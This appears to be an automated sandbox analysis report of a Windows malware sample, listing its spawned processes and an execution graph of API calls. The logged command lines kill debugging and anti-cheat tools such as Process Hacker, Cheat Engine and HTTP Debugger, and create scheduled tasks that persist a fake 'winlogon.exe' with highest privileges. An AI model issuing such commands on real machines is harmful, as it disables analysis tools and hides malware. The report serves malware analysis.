                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:172
                                                                                                                                                                                                                                                                                    Start time:12:20:37
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:173
                                                                                                                                                                                                                                                                                    Start time:12:20:37
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im FortniteClient-Win64-Shipping.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:174
                                                                                                                                                                                                                                                                                    Start time:12:20:37
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:sc stop HTTPDebuggerPro
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff672820000
                                                                                                                                                                                                                                                                                    File size:72'192 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:175
                                                                                                                                                                                                                                                                                    Start time:12:20:38
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:176
                                                                                                                                                                                                                                                                                    Start time:12:20:38
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:177
                                                                                                                                                                                                                                                                                    Start time:12:20:38
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:178
                                                                                                                                                                                                                                                                                    Start time:12:20:39
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im EpicGamesLauncher.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff7df220000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:179
                                                                                                                                                                                                                                                                                    Start time:12:20:39
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:180
                                                                                                                                                                                                                                                                                    Start time:12:20:39
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:181
                                                                                                                                                                                                                                                                                    Start time:12:20:39
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:182
                                                                                                                                                                                                                                                                                    Start time:12:20:39
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im FortniteClient-Win64-Shipping.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:183
                                                                                                                                                                                                                                                                                    Start time:12:20:40
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:184
                                                                                                                                                                                                                                                                                    Start time:12:20:40
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:185
                                                                                                                                                                                                                                                                                    Start time:12:20:40
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Users\user\AppData\Local\winlogon.exe'" /f
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff7f1520000
                                                                                                                                                                                                                                                                                    File size:235'008 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:186
                                                                                                                                                                                                                                                                                    Start time:12:20:40
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:187
                                                                                                                                                                                                                                                                                    Start time:12:20:40
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im EpicGamesLauncher.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:188
                                                                                                                                                                                                                                                                                    Start time:12:20:40
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Users\user\AppData\Local\winlogon.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff7f1520000
                                                                                                                                                                                                                                                                                    File size:235'008 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:189
                                                                                                                                                                                                                                                                                    Start time:12:20:40
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 10 /tr "'C:\Users\user\AppData\Local\winlogon.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff7f1520000
                                                                                                                                                                                                                                                                                    File size:235'008 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:231
                                                                                                                                                                                                                                                                                    Start time:12:20:43
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                    Imagebase:
                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                    Target ID:345
                                                                                                                                                                                                                                                                                    Start time:12:21:06
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                    Imagebase:
                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                    Target ID:1428
                                                                                                                                                                                                                                                                                    Start time:12:22:45
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                    Imagebase:
                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                                                      Execution Coverage:15.8%
                                                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                      Signature Coverage:51.6%
                                                                                                                                                                                                                                                                                      Total number of Nodes:1115
                                                                                                                                                                                                                                                                                      Total number of Limit Nodes:27
                                                                                                                                                                                                                                                                                      execution_graph 4799 7ff60c484514 4801 7ff60c48451c 4799->4801 4800 7ff60c484569 4801->4800 4802 7ff60c482f5c free 4801->4802 4802->4801 4171 7ff60c484393 _seh_filter_exe 4172 7ff60c472790 4173 7ff60c4727a5 4172->4173 4174 7ff60c4727c1 ?_Winerror_map@std@@YAHH 4172->4174 4175 7ff60c4727cd 4174->4175 3832 7ff60c482f90 3833 7ff60c482fa0 3832->3833 3845 7ff60c482d94 3833->3845 3835 7ff60c483728 9 API calls 3836 7ff60c483045 3835->3836 3837 7ff60c482fc4 _RTC_Initialize 3843 7ff60c483027 3837->3843 3853 7ff60c4839f8 InitializeSListHead 3837->3853 3843->3835 3844 7ff60c483035 3843->3844 3846 7ff60c482dd7 3845->3846 3847 7ff60c482da5 3845->3847 3846->3837 3848 7ff60c482e14 3847->3848 3851 7ff60c482daa __scrt_acquire_startup_lock 3847->3851 3849 7ff60c483728 9 API calls 3848->3849 3850 7ff60c482e1e 3849->3850 3851->3846 3852 7ff60c482dc7 _initialize_onexit_table 3851->3852 3852->3846 3854 7ff60c47da10 3855 7ff60c47da14 GetAsyncKeyState 3854->3855 3855->3855 3857 7ff60c47da20 3855->3857 3857->3855 3858 7ff60c476a30 3857->3858 3859 7ff60c476ad3 system 3858->3859 3861 7ff60c476c61 system 3859->3861 3863 7ff60c476dd9 3861->3863 3863->3863 3864 7ff60c476f24 system 3863->3864 3865 7ff60c476f64 system 3864->3865 3867 7ff60c4770d9 3865->3867 3867->3867 3868 7ff60c477224 system 3867->3868 3869 7ff60c477259 3868->3869 3869->3869 3870 7ff60c4773a4 system 3869->3870 3871 7ff60c4773db 3870->3871 3871->3871 3872 7ff60c477524 system 3871->3872 3873 7ff60c477586 3872->3873 3873->3873 3874 7ff60c4776d4 system 3873->3874 3876 7ff60c477716 system 3874->3876 3877 7ff60c4778a6 3876->3877 3877->3877 3878 7ff60c4779f4 system 3877->3878 3879 7ff60c477a40 system 3878->3879 3881 7ff60c477bd1 system 3879->3881 3883 7ff60c477d4b 3881->3883 3883->3883 3884 7ff60c477e94 system 3883->3884 3885 7ff60c477ef6 3884->3885 3885->3885 3886 7ff60c478044 system 3885->3886 3888 7ff60c478086 system 3886->3888 3889 7ff60c478216 3888->3889 3889->3889 3890 7ff60c478364 system 3889->3890 3891 7ff60c4783b3 system 3890->3891 3893 7ff60c478543 system 3891->3893 3895 7ff60c4786dd 3893->3895 3895->3895 3896 7ff60c478824 system 3895->3896 3897 7ff60c47887d 3896->3897 3897->3897 3898 7ff60c4789c4 system 3897->3898 3899 7ff60c478a1d 3898->3899 3899->3899 3900 7ff60c478b64 system 3899->3900 3901 7ff60c478bbd 3900->3901 3901->3901 3902 7ff60c478d04 system 3901->3902 3903 7ff60c478d66 3902->3903 3903->3903 3904 7ff60c478eb4 system 3903->3904 3905 7ff60c478f09 3904->3905 3905->3905 3906 7ff60c479054 system 3905->3906 3907 7ff60c479096 system 3906->3907 3909 7ff60c479226 3907->3909 3909->3909 3910 7ff60c479374 system 3909->3910 3911 7ff60c4793ab 3910->3911 3911->3911 3912 7ff60c4794f4 system 3911->3912 3913 7ff60c479533 system 3912->3913 3915 7ff60c4796ab 3913->3915 3915->3915 3916 7ff60c4797f4 system 3915->3916 3917 7ff60c47982b 3916->3917 3917->3917 3918 7ff60c479974 system 3917->3918 3919 7ff60c4799ab 3918->3919 3919->3919 3920 7ff60c479af4 system 3919->3920 3921 7ff60c479b2b 3920->3921 3922 7ff60c479c84 system 3920->3922 3921->3922 3923 7ff60c479cd0 system 3922->3923 3925 7ff60c479e61 system 3923->3925 3927 7ff60c479fdb 3925->3927 3927->3927 3928 7ff60c47a124 system 3927->3928 3929 7ff60c47a186 3928->3929 3929->3929 3930 7ff60c47a2d4 system 3929->3930 3931 7ff60c47a316 system 3930->3931 3933 7ff60c47a4a6 3931->3933 3933->3933 3934 7ff60c47a5f4 system 3933->3934 3935 7ff60c47a643 system 3934->3935 3937 7ff60c47a7d3 system 3935->3937 3939 7ff60c47a96d 3937->3939 3939->3939 3940 7ff60c47aab4 system 3939->3940 3941 7ff60c47ab0d 3940->3941 3941->3941 3942 7ff60c47ac54 system 3941->3942 3943 7ff60c47aca9 3942->3943 3943->3943 3944 7ff60c47adf4 system 3943->3944 3945 7ff60c47ae41 system 3944->3945 3947 7ff60c47afd2 system 3945->3947 3949 7ff60c47b14b system 3947->3949 3951 7ff60c47b2c1 system 3949->3951 3953 7ff60c47b439 3951->3953 3954 7ff60c47b68f system 3951->3954 3954->3857 4285 7ff60c484010 4286 7ff60c484023 4285->4286 4287 7ff60c484030 4285->4287 4289 7ff60c472890 4286->4289 4290 7ff60c4728a3 4289->4290 4291 7ff60c4728cf 4289->4291 4292 7ff60c4728c7 4290->4292 4293 7ff60c4728e8 _invalid_parameter_noinfo_noreturn 4290->4293 4291->4287 4294 7ff60c482f5c free 4292->4294 4295 7ff60c472930 4293->4295 4297 7ff60c472903 4293->4297 4294->4291 4295->4287 4296 7ff60c472928 4299 7ff60c482f5c free 4296->4299 4297->4296 4298 7ff60c47294a _invalid_parameter_noinfo_noreturn 4297->4298 4299->4295 4803 7ff60c47f910 ?uncaught_exception@std@ 4804 7ff60c47f92d 4803->4804 4805 7ff60c47f923 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 4803->4805 4805->4804 4300 7ff60c472000 __std_exception_destroy 4301 7ff60c472028 4300->4301 4302 7ff60c472035 4300->4302 4303 7ff60c482f5c free 4301->4303 4303->4302 4304 7ff60c471000 4305 7ff60c480510 8 API calls 4304->4305 4306 7ff60c471052 4305->4306 4307 7ff60c480510 8 API calls 4306->4307 4308 7ff60c471081 4307->4308 4309 7ff60c480510 8 API calls 4308->4309 4310 7ff60c4710aa 4309->4310 4311 7ff60c480510 8 API calls 4310->4311 4312 7ff60c4710d6 4311->4312 4313 7ff60c480510 8 API calls 4312->4313 4314 7ff60c471102 4313->4314 4315 7ff60c480510 8 API calls 4314->4315 4316 7ff60c47112e 4315->4316 4317 7ff60c480510 8 API calls 4316->4317 4318 7ff60c47115a 4317->4318 4319 7ff60c480510 8 API calls 4318->4319 4320 7ff60c471189 4319->4320 4321 7ff60c480510 8 API calls 4320->4321 4322 7ff60c4711c1 4321->4322 4323 7ff60c480510 8 API calls 4322->4323 4324 7ff60c4711fc 4323->4324 4325 7ff60c480510 8 API calls 4324->4325 4326 7ff60c471234 4325->4326 4327 7ff60c480510 8 API calls 4326->4327 4328 7ff60c47126f 4327->4328 4329 7ff60c480510 8 API calls 4328->4329 4330 7ff60c4712a7 4329->4330 4331 7ff60c480510 8 API calls 4330->4331 4332 7ff60c4712e2 4331->4332 4333 7ff60c480510 8 API calls 4332->4333 4334 7ff60c47131a 4333->4334 4335 7ff60c480510 8 API calls 4334->4335 4336 7ff60c471355 4335->4336 4337 7ff60c480510 8 API calls 4336->4337 4338 7ff60c47138d 4337->4338 4339 7ff60c480510 8 API calls 4338->4339 4340 7ff60c4713c8 4339->4340 4341 7ff60c480510 8 API calls 4340->4341 4342 7ff60c471400 4341->4342 4343 7ff60c480510 8 API calls 4342->4343 4344 7ff60c47143b 4343->4344 4345 7ff60c480510 8 API calls 4344->4345 4346 7ff60c471473 4345->4346 4347 7ff60c480510 8 API calls 4346->4347 4348 7ff60c4714ae 4347->4348 4349 7ff60c480510 8 API calls 4348->4349 4350 7ff60c4714e6 4349->4350 4351 7ff60c480510 8 API calls 4350->4351 4352 7ff60c471521 4351->4352 4353 7ff60c480510 8 API calls 4352->4353 4354 7ff60c471559 4353->4354 4355 7ff60c480510 8 API calls 4354->4355 4356 7ff60c471594 4355->4356 4357 7ff60c480510 8 API calls 4356->4357 4358 7ff60c4715cc 4357->4358 4359 7ff60c480510 8 API calls 4358->4359 4360 7ff60c471607 4359->4360 4361 7ff60c480510 8 API calls 4360->4361 4362 7ff60c47163f 4361->4362 4363 7ff60c480510 8 API calls 4362->4363 4364 7ff60c47167a 4363->4364 4365 7ff60c480510 8 API calls 4364->4365 4366 7ff60c4716b2 4365->4366 4367 7ff60c480510 8 API calls 4366->4367 4368 7ff60c4716ed 4367->4368 4369 7ff60c482c10 3 API calls 4368->4369 4379 7ff60c47170f 4369->4379 4371 7ff60c471841 4438 7ff60c472870 ?_Xlength_error@std@@YAXPEBD 4371->4438 4373 7ff60c482c10 3 API calls 4373->4379 4376 7ff60c47f770 7 API calls 4376->4379 4379->4371 4379->4373 4379->4376 4380 7ff60c4717f4 4379->4380 4418 7ff60c4813c0 4379->4418 4419 7ff60c481464 4418->4419 4423 7ff60c4813ed 4418->4423 4420 7ff60c4814d2 memcmp 4419->4420 4421 7ff60c48146e memcmp 4419->4421 4426 7ff60c481507 4420->4426 4433 7ff60c481431 4421->4433 4424 7ff60c48141e memcmp 4423->4424 4434 7ff60c481437 4423->4434 4424->4433 4427 7ff60c481509 memcmp 4426->4427 4429 7ff60c481571 memcmp 4426->4429 4437 7ff60c48153e 4427->4437 4429->4433 4430 7ff60c481753 memcmp 4430->4433 4432 7ff60c4817a7 memcmp 4432->4434 4433->4430 4433->4434 4435 7ff60c48177c 4433->4435 4434->4379 4435->4432 4435->4434 4436 7ff60c4816c5 memcmp 4436->4433 4437->4434 4437->4436 4806 7ff60c471f00 4807 7ff60c471f53 4806->4807 4807->4807 4808 7ff60c480510 8 API calls 4807->4808 4809 7ff60c471f6e 4808->4809 3492 7ff60c47c5a7 3493 7ff60c47c5c4 FindWindowA 3492->3493 3494 7ff60c47c590 3492->3494 3495 7ff60c47c5da 3493->3495 3496 7ff60c47c5d5 3493->3496 3494->3492 3498 7ff60c47c7e5 FindWindowA 3495->3498 3534 7ff60c475ee0 3496->3534 3499 7ff60c47c7fb 3498->3499 3500 7ff60c47c7f6 3498->3500 3502 7ff60c47ca14 FindWindowA 3499->3502 3501 7ff60c475ee0 7 API calls 3500->3501 3501->3499 3503 7ff60c47ca2a 3502->3503 3504 7ff60c47ca25 3502->3504 3506 7ff60c47cc35 